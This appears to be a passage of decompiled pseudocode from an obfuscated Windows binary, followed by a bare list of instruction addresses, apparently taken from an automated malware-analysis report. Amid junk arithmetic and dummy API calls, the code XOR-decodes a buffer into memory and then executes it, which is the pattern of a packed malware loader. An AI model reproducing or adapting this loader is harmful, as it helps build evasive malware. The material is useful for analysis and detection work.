					 *_v40 =  *_v40 | _v360;
					_v352 = _v268 >> 1;
					_v176 = _v284 << _v140;
					 *_v40 = _v64 &  *0x413004;
					_v196 = ( *_v164 & 0x0000ffff) + 0x857;
					 *_v40 = _v64 - _v360;
					 *_v40 = _v64 - _v360;
					_v64 =  *_v40 + _v360;
					 *_v40 =  *_v40 - _v360;
					_v284 = _v176 & _v140;
					_v348 = _v348 + 0xfb;
					 *_v164 = ( *_v164 & 0x0000ffff) + (_v196 & 0x0000ffff);
					_v209 = (_v190 & 0x000000ff) - (_v73 & 0x000000ff);
					_v360 = _v64 +  *0x413004;
					_v360 =  *_v40 | _v64;
					_v284 = _v140 << _v176;
					 *_v40 =  *_v40 >> _v360;
					_v64 =  *_v40 ^ _v360;
					_v268 = _v352 & 0x0000055b;
					_v273 = _v273 + 0x6b;
					_v190 = (_v209 & 0x000000ff) - (_v73 & 0x000000ff);
					_v196 = ( *_v164 & 0x0000ffff) - 0xdcc;
					_v140 = _v284 + _v176;
					_t2741 =  *0x413004; // 0x0
					_v360 = _t2741 -  *_v40;
					 *_v40 = _v64 + _v360;
					 *0x413004 = _v64 & _v360;
					_v284 = _v176 + _v140;
					_v360 =  *_v40 ^ _v64;
					_t2256 =  *0x413004; // 0x0
					_v64 = _v360 << _t2256;
					_v176 = _v140 >> _v284;
					_v196 =  *_v164 & 0x0000ffff | 0x00000461;
				}
				_v73 = (_v209 & 0x000000ff) - (_v190 & 0x000000ff);
				_v384 =  &_v360;
				_v200 =  &_v64;
				while(_v248 > 0x6d68) {
					 *0x413004 = _v64 & _v360;
					_v273 = _v273 - 0x7c;
					 *_v164 = ( *_v164 & 0x0000ffff) + (_v196 & 0x0000ffff);
					_v209 = (_v73 & 0x000000ff) - (_v190 & 0x000000ff);
					_v248 = _v248 - 0x9a;
					_v140 = _v176 + _v284;
					_v284 = _v140 + _v176;
					 *_v40 =  *_v40 - _v360;
					_v360 = _v64 +  *0x413004;
					_v64 =  *_v40 & _v360;
					 *0x413004 = _v360 << _v64;
					_v196 =  *_v164 & 0x0000ffff ^ 0x00000b5c;
					_v176 = _v140 >> _v284;
					_v64 = _v360 |  *0x413004;
				}
				_v332 =  &_v360;
				_v284 = _v176 - _v140;
				_v12 = AddAtomW(L"sR~VjZBN-uIkY");
				_v388 = _v268;
				if(_v388 == 0x217) {
					_v73 = (_v209 & 0x000000ff) + (_v190 & 0x000000ff);
					E004042B0(_v273 & 0x000000ff, _v360, _v360, _v273 & 0x000000ff, _v176);
				} else {
					_v44 =  &_v196;
					_v201 = _v273;
					_v376 = _v352;
					 *0x436124 = _v376;
					_v48 = _v140;
					 *_v332 = _v64 &  *_v40;
					_v160 = GetCurrentProcessId();
				}
				if(_v201 - 2 <= _v273) {
					_v290 = _v209;
					_v104 =  &_v196;
					 *_v200 =  *_v200 +  *_v332;
					_v392 = _v190;
					if(_v392 == 3) {
						_v48 = _v284 - _v140;
						_v64 =  *_v332 -  *_v384;
						_v156 = VerInstallFileW(0xe7, _v260, _v316, _v28, _v28, _v316, _v28,  &_v260);
					}
				}
				 *_v200 = _v64 + _v360;
				 *0x435188 = _v376 - _v268;
				_v189 = _v73;
				_v396 =  *_v40;
				if(_v396 == 0x4bd6) {
					 *_v164 = (_v196 & 0x0000ffff) + ( *_v104 & 0x0000ffff);
					E004042B0(_v273 & 0x000000ff,  *_v40, _v64, _v273 & 0x000000ff, _v156);
					 *_v164 = (_v196 & 0x0000ffff) - ( *_v44 & 0x0000ffff);
					E004066B0( *_v332,  *_v384);
					_v360 = _v64 ^  *_v40;
				} else {
					if(( *_v104 & 0x0000ffff |  *_v44 & 0x0000ffff) < (_v196 & 0x0000ffff) << ( *_v164 & 0x0000ffff)) {
						_v360 =  *_v384 >>  *_v40;
						_t1702 =  *0x413004; // 0x0
						_v360 = _t1702 & _v64;
						 *_v384 =  *_v40 + _v360;
						_v273 = _v201 + 0x55;
						 *0x436124 = _v268 &  *0x435188;
						 *_v164 = ( *_v44 & 0x0000ffff) - (_v196 & 0x0000ffff);
						E00404190(_v196,  *_v104, _v196 & 0x0000ffff);
					}
				}
				_v209 = (_v189 & 0x000000ff) + (_v290 & 0x000000ff);
				_v240 = _v156;
				_v344 = 0x882d;
				_v24 =  &_v176;
				_v36 = 0x3885;
				_v73 = (_v290 & 0x000000ff) - (_v190 & 0x000000ff);
				_v72 =  *_v164;
				 *_v40 = _v360 +  *_v384;
				_v400 = _v268;
				if(_v400 == 0x6e) {
					_v201 = _v273 + 0x3a;
					 *_v200 = _v64 + _v360;
				} else {
					if(_v400 == 0x3a5) {
						_v284 =  *_v24 - _v176;
						 *0x413004 = _v64 <<  *_v384;
						_v64 =  *_v40 ^  *_v200;
						_v128 = GetFileVersionInfoW(_v80, 0xde, 0x9d,  &_v200);
						 *_v44 = (_v196 & 0x0000ffff) >> ( *_v104 & 0x0000ffff);
						_v73 = _v290 & 0x000000ff | _v190 & 0x000000ff;
						_v48 =  *_v24 & _v140;
						 *_v200 = _v360 -  *_v40;
						_push(_v290 & 0x000000ff);
						E00404200(_v189 & 0x000000ff, _v201 & 0x000000ff);
					}
				}
				_v288 =  &_v196;
				 *0x413786 = (_v290 & 0x000000ff) - (_v73 & 0x000000ff);
				_v404 = _v73;
				if(_v404 == 0x64) {
					_v189 = _v209 & 0x000000ff & _v290 & 0x000000ff;
					_v176 = _v48 - _v240;
					_v64 =  *_v332 +  *_v40;
					 *_v40 = _v360 -  *_v384;
					_v176 = _v140 + _v284;
					_v64 = _v360 ^  *0x413004;
					_v189 = _v209 & 0x000000ff | _v190 & 0x000000ff;
					_v72 = ( *_v104 & 0x0000ffff) << ( *_v164 & 0x0000ffff);
					_v228 = VerQueryValueW( &_v140, _v28,  &_v290,  &_v228);
				} else {
					 *0x436121 = _v189;
					_v300 = _v360;
					_v96 =  &_v140;
				}
				_v360 =  *_v332 >> _v300;
				_v408 = _v300;
				if(_v408 == 0) {
					_v152 =  &_v360;
					__imp__AssignProcessToJobObject(0, 0);
					_v92 =  &_v190;
					_v52 =  *_v164;
					_v261 = _v273;
					_v352 = _v376 & _v268;
				} else {
					 *_v24 =  *_v96 - _v140;
					E00404260();
					 *_v152 =  *_v152 + _v300;
					_v189 = ( *_v92 & 0x000000ff) - (_v290 & 0x000000ff);
				}
				_v196 = (_v52 & 0x0000ffff) + (_v72 & 0x0000ffff);
				_v132 =  *_v96;
				__imp__AssignProcessToJobObject(0, 0);
				if(_v376 + _v352 >= (_v268 &  *0x436124)) {
					_v64 =  *_v200 -  *_v152;
					E004042B0(_v273 & 0x000000ff,  *_v332, _v300, _v261 & 0x000000ff, _v132);
					_v300 =  *_v332 - _v64;
					 *_v96 = _v48 +  *_v24;
					_v190 = ( *0x436121 & 0x000000ff) << (_v73 & 0x000000ff);
					 *0x413786 = ( *_v92 & 0x000000ff) >> (_v73 & 0x000000ff);
				}
				_v64 = _v360 | _v300;
				_v368 =  *_v384;
				_v340 =  &_v176;
				_v64 =  *_v332 ^  *_v152;
				_v56 =  &_v368;
				_v268 = _v376 & _v352;
				_v273 = _v261 - _v201;
				_v144 = _v72;
				 *0x413787 = _v261 + _v201;
				_v148 = 0xe70f;
				_v252 =  &_v73;
				_v412 = _v140;
				if(_v412 == 0xcbfa) {
					E00404190( *_v288, _v196, _v72 & 0x0000ffff);
					goto L85;
				} else {
					do {
						_v52 = (_v144 & 0x0000ffff) - ( *_v104 & 0x0000ffff);
						_v48 = _v156 & _v176;
						_t2332 =  *0x413004; // 0x0
						_v360 = _t2332 - _v368;
						_v368 = _v300 ^ _v64;
						 *_v340 =  *_v24 << _v156;
						_v72 = (_v196 & 0x0000ffff) >> ( *_v164 & 0x0000ffff);
						_v190 = _v209 & 0x000000ff | _v73 & 0x000000ff;
						_t1362 =  *0x413004; // 0x0
						_v300 = _t1362 + _v360;
						 *_v152 = _v64 &  *_v56;
						_v268 = _v352 + _v376;
						 *_v92 = ( *_v92 & 0x000000ff) - ( *_v252 & 0x000000ff);
						 *_v252 = ( *_v252 & 0x000000ff) - ( *_v92 & 0x000000ff);
						_v196 = (_v72 & 0x0000ffff) - ( *_v44 & 0x0000ffff);
						 *_v340 = _v284 +  *_v96;
						_v176 =  *_v24 + _v48;
						_v360 =  *_v152 +  *_v56;
						 *_v152 =  *_v332 & _v368;
						 *_v332 = _v360 << _v300;
						_v144 = _v72 & 0x0000ffff ^ _v196 & 0x0000ffff;
						_v189 =  *_v92 & 0x000000ff | _v73 & 0x000000ff;
						_v148 = _v148 + 0xdf;
						_v176 = _v140 >>  *_v96;
						_v360 = _v64 -  *_v152;
						_v300 = _v64 -  *_v56;
						 *0x413786 =  *0x436121 & 0x000000ff & _v290 & 0x000000ff;
						_v290 = ( *_v252 & 0x000000ff) + (_v209 & 0x000000ff);
						 *_v104 = (_v52 & 0x0000ffff) - (_v196 & 0x0000ffff);
						_v273 = _v261 - _v201;
						 *_v164 = (_v72 & 0x0000ffff) + (_v196 & 0x0000ffff);
						 *_v24 = _v156 +  *_v96;
						_v300 = _v360 -  *_v40;
						_v52 = (_v72 & 0x0000ffff) + ( *_v44 & 0x0000ffff);
						_v73 = ( *_v252 & 0x000000ff) + ( *_v92 & 0x000000ff);
						 *_v152 =  *_v200 | _v64;
						_v240 =  *_v96 << _v132;
						_v64 =  *_v56 >>  *_v384;
						_v64 = _v368 ^ _v360;
						 *_v92 =  *_v92 & 0x000000ff &  *_v252 & 0x000000ff;
						_v52 = ( *_v44 & 0x0000ffff) - (_v144 & 0x0000ffff);
						_v100 = DeleteAtom(_v12 & 0x0000ffff);
						 *_v24 =  *_v340 -  *_v96;
						_v64 =  *_v56 &  *_v200;
					} while (_v148 <= 0x13496);
					 *_v152 = _v368 - _v360;
					 *0x43518c =  *_v332 +  *_v384;
					while(_v36 <= 0x4aa6) {
						 *_v384 =  *_v384 -  *_v152;
						_v360 = _v368 +  *_v200;
						_v376 =  *0x436124 + _v352;
						_v273 = _v261 | _v201;
						_v72 = _v196 & 0x0000ffff ^ _v52 & 0x0000ffff;
						_v189 = ( *_v92 & 0x000000ff) << (_v209 & 0x000000ff);
						_v156 = _v240;
						_v140 = _v48 >>  *_v340;
						 *_v104 =  *_v104 & 0x0000ffff &  *_v44 & 0x0000ffff;
						 *_v92 = ( *_v252 & 0x000000ff) + (_v209 & 0x000000ff);
						_v368 = _v360 -  *_v152;
						_v48 = _v284 - _v176;
						_v300 =  *_v332 - _v368;
						 *_v384 = _v64 &  *0x43518c;
						_v73 = (_v189 & 0x000000ff) + ( *_v252 & 0x000000ff);
						_v72 = ( *_v104 & 0x0000ffff) + (_v52 & 0x0000ffff);
						 *_v340 =  *_v24 -  *_v96;
						 *0x43518c =  *_v384 +  *_v200;
						_v273 = _v261 >> _v201;
						_v268 = _v352 << _v376;
						_v52 = _v196 & 0x0000ffff ^  *_v164 & 0x0000ffff;
						_v190 = _v290 & 0x000000ff |  *_v92 & 0x000000ff;
						_v284 =  *_v24 &  *_v340;
						_v300 = _v64 +  *0x43518c;
						_v64 = _v360 + _v300;
						_v176 = _v48 - _v140;
						 *0x413004 =  *_v332 + _v64;
						_v36 = _v36 + 0x5b;
						 *_v164 = (_v72 & 0x0000ffff) - ( *_v288 & 0x0000ffff);
						_v209 = _v190 & 0x000000ff & _v290 & 0x000000ff;
						_v368 =  *_v56 -  *_v200;
						 *_v340 =  *_v340 -  *_v96;
						_t1666 =  *0x43518c; // 0x0
						_v300 = _t1666 +  *_v40;
						 *_v152 = _v368 >>  *_v200;
						_v290 = _v73 & 0x000000ff |  *_v92 & 0x000000ff;
						 *_v104 = (_v144 & 0x0000ffff) << ( *_v288 & 0x0000ffff);
						 *_v40 =  *_v332 ^  *_v384;
						_v376 = _v268 & _v352;
					}
					while(_v344 != 0xa473) {
						_v48 =  *_v96 - _v132;
						 *_v40 = _v360 +  *_v332;
						_v52 = (_v196 & 0x0000ffff) + ( *_v104 & 0x0000ffff);
						_v209 = ( *_v252 & 0x000000ff) - ( *_v92 & 0x000000ff);
						_v176 = _v140 - _v156;
						_v300 =  *_v56 +  *_v384;
						_v64 = _v300 &  *_v56;
						 *0x436121 = (_v73 & 0x000000ff) - ( *_v252 & 0x000000ff);
						_v196 = _v72 & 0x0000ffff | _v52 & 0x0000ffff;
						_v209 = ( *_v252 & 0x000000ff) << ( *_v92 & 0x000000ff);
						_v360 =  *_v40 ^ _v64;
						 *_v332 = _v300 >> _v64;
						 *_v340 =  *_v96 + _v140;
						 *_v332 = _v300 &  *_v200;
						 *_v56 =  *_v200 -  *_v40;
						_v273 = _v261 - _v201;
						 *_v40 =  *_v56 -  *_v384;
						 *_v104 = (_v196 & 0x0000ffff) + ( *_v164 & 0x0000ffff);
						_v189 = (_v209 & 0x000000ff) + (_v290 & 0x000000ff);
						_v284 =  *_v340 - _v48;
						_v300 = _v64 +  *_v384;
						 *_v104 =  *_v104 & 0x0000ffff &  *_v44 & 0x0000ffff;
						_v73 =  *0x436121 & 0x000000ff ^  *_v92 & 0x000000ff;
						_v284 = _v132 >>  *_v340;
						_v300 =  *_v384 << _v368;
						 *_v152 =  *_v332 |  *_v384;
						_v284 = _v176 + _v156;
						_v196 = (_v144 & 0x0000ffff) - ( *_v44 & 0x0000ffff);
						 *_v92 = _v190 & 0x000000ff & _v189 & 0x000000ff;
						_v300 = _v360 - _v64;
						_v100 = AddAtomW(L"N3B2");
						_v64 = _v360 +  *_v40;
						 *_v40 =  *_v384 + _v300;
						_v376 = _v352 - _v268;
						_v52 = (_v196 & 0x0000ffff) - ( *_v164 & 0x0000ffff);
						 *0x436121 = ( *_v92 & 0x000000ff) + (_v189 & 0x000000ff);
						 *_v24 = _v240 +  *_v340;
						_v48 =  *_v96 -  *_v24;
						_t2104 =  *0x413004; // 0x0
						_v368 = _v300 << _t2104;
						_v344 = _v344 + 0x4d;
						_v368 = _v360 >>  *_v56;
						_v112 = DeleteAtom(_v12 & 0x0000ffff);
						_v64 = _v360 ^ _v300;
						ReleaseSemaphore(0, 0, 0);
						_v290 =  *_v92 & 0x000000ff | _v190 & 0x000000ff;
						_v52 =  *_v288 & 0x0000ffff & _v196 & 0x0000ffff;
						 *_v24 = _v48 -  *_v96;
					}
					_v136 = 0x7c5bc7d7;
					_v208 = CreateEventW(0, 0, 0, 0);
					_v244 = _v360;
					_v136 = _v136 - 0x7c57c7d7;
					_v368 =  *_v200 - _v300;
					_v48 =  *_v24 & _v284;
					_v356 =  &_v189;
					_v220 = 0x47415c7f;
					if(_v273 +  *0x413787 == _v261 + _v201) {
						E00404260();
						L84:
						 *_v104 = (_v72 & 0x0000ffff) - ( *_v288 & 0x0000ffff);
						_v376 =  *0x436124 >> _v268;
						_v261 = _v201 ^ _v273;
						_v132 =  *_v340 | _v140;
						L85:
						 *_v340 = _v140 + _v48;
						_v300 =  *_v384 -  *_v332;
						_v290 = ( *_v252 & 0x000000ff) + (_v209 & 0x000000ff);
						goto L88;
					}
					if( *_v24 <<  *_v340 >= ( *_v96 & _v132)) {
						if(_v376 + _v268 >= _v352 +  *0x435188) {
							_v304 = _v144;
							 *_v40 = _v300 &  *_v332;
						}
					} else {
						_v244 =  *_v200 - _v300;
						 *0x413786 = ( *_v356 & 0x000000ff) - ( *0x436121 & 0x000000ff);
					}
					_v220 = _v220 - 0x47414b4e;
					if(_v376 + _v268 == _v352 -  *0x436124) {
						 *_v96 = _v140 -  *_v24;
						_v64 =  *_v332 + _v368;
						_v64 =  *_v40 ^ _v368;
						_v304 = ( *_v288 & 0x0000ffff) >> (_v196 & 0x0000ffff);
					}
					_v308 = _v220;
					_v32 =  &_v189;
					_v132 = _v284 << _v48;
					 *0x436120 = _v261; // executed
					_t1433 = FreeConsole(); // executed
					E00403150(_t1433,  &_v189); // executed
					_v416 =  *_v288 & 0x0000ffff;
					if(_v416 == 0xab3) {
						L53:
						_v300 = _v360 &  *_v200;
						goto L82;
					} else {
						 *_v152 = _v64 - _v360;
						_v280 =  *_v56;
						_v100 = DeleteAtom(_v100 & 0x0000ffff);
						_v352 = _v376 - _v268;
						_v289 = _v261;
						_v380 = _v116(_v136, _v220, _v308);
						_v420 =  *_v164 & 0x0000ffff;
						if(_v420 == 0x334) {
							_v304 = ( *_v104 & 0x0000ffff) - ( *_v288 & 0x0000ffff);
							goto L81;
						} else {
							_v290 = ( *_v252 & 0x000000ff) + (_v73 & 0x000000ff);
							_v360 = _v368 +  *_v40;
							_v68 =  &_v132;
							_v360 =  *_v40 | _v64;
							_v320 = _v244;
							__imp__AssignProcessToJobObject(0, 0);
							_v20 = _v380;
							_v424 = _v196 & 0x0000ffff;
							if(_v424 == 0x66f4) {
								if((_v156 ^ _v140) ==  *_v68 >> _v176) {
									if(_v48 <<  *_v24 <= (_v176 & _v240)) {
										_v244 =  *_v384 +  *_v152;
									}
								} else {
									 *_v32 = (_v209 & 0x000000ff) - (_v290 & 0x000000ff);
									_v172 = _v72;
									_v48 =  *_v96 - _v140;
								}
							} else {
								 *_v40 =  *_v200 +  *_v56;
							}
							_v336 = 0xa7ec3a21;
							_v268 = _v352 - _v376;
							_v309 =  *_v252;
							 *_v44 = ( *_v44 & 0x0000ffff) + ( *_v164 & 0x0000ffff);
							_v88 = 0x70;
							_v60 =  *_v68;
							 *0x435190 =  *_v332 & _v280;
							_v64 =  *_v384 -  *_v40;
							_v272 = DeleteAtom(_v12 & 0x0000ffff);
							_v232 = _v124;
							_v60 = _v156 << _v132;
							_v216 =  &_v244;
							_v72 = _v304 & 0x0000ffff ^  *_v288 & 0x0000ffff;
							_v16 =  &_v189;
							_v320 = _v368 |  *_v332;
							_v168 = 0x32800;
							 *_v96 =  *_v24 >> _v240;
							_v428 = _v261;
							if(_v428 == 0x76) {
								_v280 =  *_v152 +  *_v384;
								 *0x43518c =  *_v216 & _v244;
								_v189 = ( *_v32 & 0x000000ff) + (_v290 & 0x000000ff);
								 *_v44 = ( *_v288 & 0x0000ffff) - (_v144 & 0x0000ffff);
							}
							_v168 = _v168 | 0x04844410;
							_v361 = _v261;
							_v376 = _v268 +  *0x436124;
							_v372 =  *_v340;
							_v280 = _v64 +  *_v200;
							while(_v88 < _v168) {
								ReleaseSemaphore(0, 0, 0);
								 *_v32 = ( *_v252 & 0x000000ff) - ( *_v16 & 0x000000ff);
								 *_v104 = (_v196 & 0x0000ffff) - (_v144 & 0x0000ffff);
								_v105 =  *_v232;
								 *0x413787 =  *0x436120 + _v289;
								_v360 =  *_v152 &  *_v216;
								_v280 =  *_v216 ^  *_v56;
								 *_v68 =  *_v340 | _v60;
								_v73 = (_v189 & 0x000000ff) << ( *0x436121 & 0x000000ff);
								asm("ror al, cl");
								_v72 = (_v144 & 0x0000ffff) >> (_v304 & 0x0000ffff);
								 *_v56 =  *_v200 -  *_v216;
								_v105 = _v105 & 0x000000ff ^ _v336;
								_v280 =  *_v332 + _v300;
								_v48 =  *_v68 & _v132;
								 *_v20 = _v105;
								_v120 = CreateEventW(0, 0, 0, 0);
								 *0x435190 =  *_v40 + _v368;
								_v232 = _v232 + 1;
								_v320 =  *_v384 +  *_v332;
								 *_v200 =  *_v56 -  *0x43518c;
								_v352 = _v376 - _v268;
								_v20 = _v20 + 1;
								 *_v252 = (_v73 & 0x000000ff) - (_v309 & 0x000000ff);
								_v196 = (_v144 & 0x0000ffff) + ( *_v44 & 0x0000ffff);
								_v336 = _v336 * 0xed13;
								_v60 = _v156 - _v176;
								 *_v40 =  *_v152 -  *0x413004;
								_v336 = _v336 - 0x8d9;
								 *_v252 = (_v73 & 0x000000ff) << ( *_v92 & 0x000000ff);
								 *0x413004 = _v300 | _v360;
								_v140 =  *_v68 >> _v156;
								_v360 = _v280 ^ _v368;
								_v280 = _v300 &  *_v40;
								_v88 = _v88 + 0x6966e;
								PulseEvent(0);
								_v60 =  *_v24 +  *_v340;
								_v72 = (_v52 & 0x0000ffff) + ( *_v164 & 0x0000ffff);
								 *_v92 = _v309 & 0x000000ff &  *_v252 & 0x000000ff;
								 *_v384 =  *_v200 - _v320;
							}
							_v224 =  *_v384;
							 *0x43518a = _v201 + _v361;
							_v188 = _v380 + 0xb0;
							_v376 = _v352 -  *0x436124;
							if(_v268 -  *0x435188 >= _v352 + _v376) {
								if( *_v96 << _v48 < (_v60 | _v176)) {
									 *_v200 = _v360 - _v244;
									_v296 = GetCurrentProcessId();
									_v84 = _v368;
									_v184 = _v124 + 0xb0;
									_v432 =  *_v68;
									if(_v432 == 0x44ca) {
										_v304 = ( *_v44 & 0x0000ffff) + ( *_v164 & 0x0000ffff);
									} else {
										if(_v432 == 0xfffffffc) {
											_v304 = (_v196 & 0x0000ffff) + ( *_v104 & 0x0000ffff);
											 *0x436122 = _v189;
											_v328 =  &_v60;
											 *_v332 = _v368 & _v84;
											_v224 = _v360 - _v368;
											_v256 = _v284;
										}
									}
									 *_v32 = ( *_v92 & 0x000000ff) + ( *_v356 & 0x000000ff);
									_v5 = _v361;
									_v380( &_v188);
									_v268 = _v352 +  *0x435188;
									 *0x435194 =  *_v96 |  *_v340;
								}
							} else {
								_v224 =  *_v200 - _v368;
							}
							_v172 = (_v72 & 0x0000ffff) >> (_v304 & 0x0000ffff);
							 *_v356 =  *_v92 & 0x000000ff ^ _v73 & 0x000000ff;
							_v240 = _v60 & _v48;
							_v284 =  *_v24 -  *_v96;
							L81:
							_v144 = (_v196 & 0x0000ffff) + (_v52 & 0x0000ffff);
							 *_v92 = (_v73 & 0x000000ff) + ( *_v32 & 0x000000ff);
							 *0x413787 = _v273 - _v201;
							_v176 = _v132 &  *_v340;
							L82:
							_v64 =  *_v56 | _v300;
							E004042B0(_v201 & 0x000000ff,  *_v56,  *_v200, _v201 & 0x000000ff,  *_v340);
							goto L84;
						}
						goto L53;
					}
				}
			}

0x004042f9
0x00404300
0x00404307
0x00404317
0x0040431f
0x00404326
0x00404335
0x00404342
0x0040434f
0x00406636
0x00406649
0x0040665a
0x00406667
0x00406675
0x0040667a
0x0040667a
0x0040667e
0x00406684
0x00406691
0x004066a2
0x004066ad
0x004066ad
0x0040435c
0x00404363
0x00404376
0x00404381
0x0040438a
0x0040438d
0x0040439d
0x004043a6
0x004043c5
0x004065d6
0x004065e4
0x004065ee
0x004065ee
0x004065f3
0x00406602
0x00406611
0x00406623
0x00406629
0x00000000
0x00406629
0x004043cb
0x004043ee
0x004043fd
0x0040440e
0x0040441d
0x0040442d
0x0040443f
0x00404453
0x00404465
0x00404477
0x00404485
0x00404493
0x004044a1
0x004044b5
0x004044cc
0x004044dd
0x004044e5
0x004044f7
0x00404504
0x00404517
0x0040452c
0x00404541
0x0040454c
0x00404561
0x00404573
0x00404583
0x00404596
0x004045a4
0x004045b1
0x004045c2
0x004045d0
0x004045e2
0x00404600
0x00404610
0x0040461f
0x0040462d
0x00404641
0x00404657
0x00404664
0x00404673
0x00404684
0x00404697
0x004046ac
0x004046bf
0x004046c8
0x004046d0
0x004046e2
0x004046ed
0x004046ff
0x0040470d
0x00404719
0x00404721
0x00404732
0x00404747
0x00404747
0x00404763
0x0040476c
0x00404775
0x0040477b
0x00404794
0x004047a3
0x004047c1
0x004047d1
0x004047e3
0x004047f5
0x00404807
0x0040481b
0x00404826
0x00404837
0x00404845
0x0040485a
0x0040486f
0x00404881
0x00404881
0x0040488f
0x004048a1
0x004048b2
0x004048bd
0x004048cd
0x004048e1
0x00404909
0x004048cf
0x00404916
0x0040491f
0x0040492c
0x0040493a
0x00404947
0x00404958
0x00404960
0x00404960
0x00404979
0x00404985
0x00404991
0x004049aa
0x004049b2
0x004049bf
0x004049cf
0x004049e2
0x00404a17
0x00404a17
0x004049bf
0x00404a2c
0x00404a3e
0x00404a48
0x00404a53
0x00404a63
0x00404a7f
0x00404aa3
0x00404abd
0x00404ad2
0x00404adf
0x00404a65
0x00404b0c
0x00404b21
0x00404b27
0x00404b2f
0x00404b46
0x00404b52
0x00404b68
0x00404b84
0x00404b9b
0x00404b9b
0x00404b0c
0x00404bb0
0x00404bbc
0x00404bc2
0x00404bd2
0x00404bd5
0x00404bec
0x00404bf8
0x00404c0d
0x00404c16
0x00404c23
0x00404cfd
0x00404d12
0x00404c29
0x00404c33
0x00404c45
0x00404c58
0x00404c6b
0x00404c88
0x00404c9d
0x00404cb0
0x00404cbe
0x00404cd2
0x00404cdb
0x00404cec
0x00404cec
0x00404c33
0x00404d1a
0x00404d2d
0x00404d36
0x00404d43
0x00404d5a
0x00404d69
0x00404d7c
0x00404d90
0x00404d9e
0x00404db0
0x00404dc3
0x00404dda
0x00404dfc
0x00404d45
0x00404e0a
0x00404e15
0x00404e21
0x00404e21
0x00404e34
0x00404e40
0x00404e4d
0x00404e57
0x00404e61
0x00404e6d
0x00404e79
0x00404e83
0x00404e99
0x00404e4f
0x00404eb0
0x00404eb2
0x00404ecb
0x00404edc
0x00404edc
0x00404eec
0x00404ef8
0x00404eff
0x00404f27
0x00404f39
0x00404f60
0x00404f70
0x00404f81
0x00404f90
0x00404fa2
0x00404fa2
0x00404fb4
0x00404fbf
0x00404fcb
0x00404fe1
0x00404fea
0x00404ffd
0x00405014
0x0040501e
0x00405035
0x0040503b
0x00405048
0x00405054
0x00405064
0x0040507c
0x00000000
0x00405066
0x00405086
0x00405095
0x004050a5
0x004050a8
0x004050b4
0x004050c3
0x004050dc
0x004050f0
0x00405101
0x00405107
0x00405112
0x00405126
0x00405138
0x00405153
0x0040516c
0x0040517a
0x00405192
0x0040519c
0x004051af
0x004051c9
0x004051df
0x004051ee
0x00405201
0x00405212
0x00405225
0x00405236
0x00405244
0x0040525a
0x00405272
0x00405288
0x0040529b
0x004052b4
0x004052c5
0x004052d2
0x004052e4
0x004052f9
0x0040530d
0x00405319
0x0040532e
0x0040533d
0x00405354
0x00405365
0x00405374
0x00405388
0x00405397
0x0040539a
0x004053bc
0x004053ce
0x004053d4
0x004053f7
0x00405407
0x0040541d
0x00405434
0x00405447
0x0040545a
0x00405466
0x00405479
0x00405490
0x004054a8
0x004054b8
0x004054ca
0x004054db
0x004054f0
0x00405504
0x00405513
0x00405527
0x00405539
0x0040554f
0x00405565
0x0040557e
0x00405591
0x004055a4
0x004055b3
0x004055c5
0x004055d1
0x004055e2
0x004055ee
0x00405606
0x00405619
0x0040562c
0x00405645
0x0040564a
0x00405651
0x0040566d
0x0040567b
0x00405696
0x004056ac
0x004056be
0x004056be
0x004056ca
0x004056e2
0x004056f6
0x00405707
0x0040571c
0x0040572e
0x00405741
0x00405752
0x00405764
0x00405774
0x0040578c
0x0040579a
0x004057b1
0x004057c4
0x004057da
0x004057ec
0x004057fe
0x00405814
0x0040582b
0x0040583e
0x0040584f
0x00405860
0x00405877
0x00405889
0x00405899
0x004058af
0x004058cb
0x004058d9
0x004058ee
0x00405908
0x00405913
0x00405924
0x00405933
0x00405947
0x00405959
0x00405972
0x00405985
0x0040599c
0x004059a8
0x004059b1
0x004059b9
0x004059c8
0x004059db
0x004059ec
0x004059fc
0x00405a05
0x00405a1a
0x00405a32
0x00405a41
0x00405a41
0x00405a48
0x00405a60
0x00405a6c
0x00405a7d
0x00405a91
0x00405aa2
0x00405aab
0x00405ab1
0x00405add
0x00406528
0x0040652d
0x0040653f
0x00406552
0x00406569
0x0040657d
0x00406580
0x0040658f
0x004065a1
0x004065b9
0x00000000
0x004065b9
0x00405afc
0x00405b4e
0x00405b57
0x00405b6f
0x00405b6f
0x00405afe
0x00405b0c
0x00405b24
0x00405b24
0x00405b7d
0x00405ba5
0x00405bb5
0x00405bc5
0x00405bd3
0x00405be8
0x00405be8
0x00405bf5
0x00405c01
0x00405c0f
0x00405c18
0x00405c1e
0x00405c24
0x00405c32
0x00405c42
0x00405c46
0x00405c54
0x00000000
0x00405c44
0x00405c6e
0x00405c75
0x00405c86
0x00405c9a
0x00405ca7
0x00405cc5
0x00405cd4
0x00405ce4
0x00405cf9
0x00000000
0x00405ce6
0x00405d14
0x00405d25
0x00405d2e
0x00405d39
0x00405d45
0x00405d4f
0x00405d5b
0x00405d65
0x00405d75
0x00405d94
0x00405dde
0x00405df0
0x00405df0
0x00405d96
0x00405da9
0x00405daf
0x00405dc1
0x00405dc1
0x00405d77
0x00405e08
0x00405e08
0x00405e0a
0x00405e24
0x00405e33
0x00405e4d
0x00405e50
0x00405e5c
0x00405e6d
0x00405e7f
0x00405e8d
0x00405e97
0x00405ea8
0x00405eb1
0x00405ec9
0x00405ed3
0x00405ee4
0x00405eea
0x00405f04
0x00405f0c
0x00405f19
0x00405f2d
0x00405f41
0x00405f56
0x00405f71
0x00405f71
0x00405f7f
0x00405f8b
0x00405fa1
0x00405fb0
0x00405fc1
0x00405fc7
0x00405fdc
0x00405ff6
0x0040600b
0x00406016
0x00406029
0x0040603f
0x00406052
0x00406066
0x00406078
0x00406084
0x00406099
0x004060b0
0x004060bc
0x004060cd
0x004060db
0x004060e4
0x004060f4
0x00406102
0x00406110
0x00406126
0x0040613d
0x0040614f
0x0040615c
0x00406172
0x00406183
0x00406196
0x004061a8
0x004061bc
0x004061ca
0x004061e2
0x004061f0
0x00406203
0x00406215
0x00406226
0x00406234
0x00406239
0x0040624c
0x0040625e
0x00406277
0x0040628d
0x0040628d
0x0040629c
0x004062b2
0x004062c4
0x004062da
0x00406303
0x00406333
0x0040634b
0x00406353
0x0040635f
0x0040636b
0x00406376
0x00406386
0x00406400
0x00406388
0x0040638f
0x004063a2
0x004063af
0x004063b8
0x004063cd
0x004063db
0x004063e7
0x004063e7
0x0040638f
0x0040641b
0x00406423
0x0040642d
0x00406443
0x00406457
0x00406457
0x00406305
0x00406313
0x00406313
0x00406469
0x00406482
0x0040648a
0x0040649a
0x004064a0
0x004064ad
0x004064c3
0x004064d5
0x004064e5
0x004064eb
0x004064f6
0x00406521
0x00000000
0x00406521
0x00000000
0x00405ce4
